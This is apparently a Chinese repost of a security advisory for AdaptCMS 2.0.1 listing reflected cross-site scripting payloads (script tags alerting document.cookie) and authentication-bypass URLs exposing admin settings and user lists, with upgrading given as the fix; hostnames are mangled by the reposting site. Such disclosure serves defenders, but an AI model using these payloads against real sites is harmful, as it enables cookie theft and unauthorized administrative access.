标题: AdaptCMS 2.0.1 Multiple security vulnerabilities
作者: Stefan Schurtz
影响版本: AdaptCMS 2.0.1测试成功
开发网站: http://HdhCmsTestadaptcms测试数据/ HdhCmsTest2cto测试数据
状态:已修复
缺陷描述:
AdaptCMS 2.0.1存在多个缺陷
==================
技术分析
==================
Cross-site Scripting
http://HdhCmsTest2cto测试数据 /AdaptCMS/admin.php?view=</script><script>alert(document.
cookie)</script>
http://HdhCmsTest2cto测试数据 /AdaptCMS/admin.php?view=share&do=</script><script>alert(
document.cookie)</script>
http://HdhCmsTest2cto测试数据 /AdaptCMS//?'</script><script>alert(document.cookie)</scr
ipt>
http://HdhCmsTest2cto测试数据 /AdaptCMS//index.php?'</script><script>alert(document.coo
kie)</script>
Authentication bypass / Information Disclosure
http://HdhCmsTest2cto测试数据 /AdaptCMS/admin.php?view=/&view=settings
http://HdhCmsTest2cto测试数据 /AdaptCMS/admin.php?view=/&view=users
http://HdhCmsTest2cto测试数据 /AdaptCMS/admin.php?view=/&view=groups
http://HdhCmsTest2cto测试数据 /AdaptCMS/admin.php?view=/&view=levels
http://HdhCmsTest2cto测试数据 /AdaptCMS/admin.php?view=/&view=stats
=========
解决方案
=========
升级
查看更多关于AdaptCMS 2.0.1多个安全缺陷及修复 - 网站安全 - 自学的详细内容...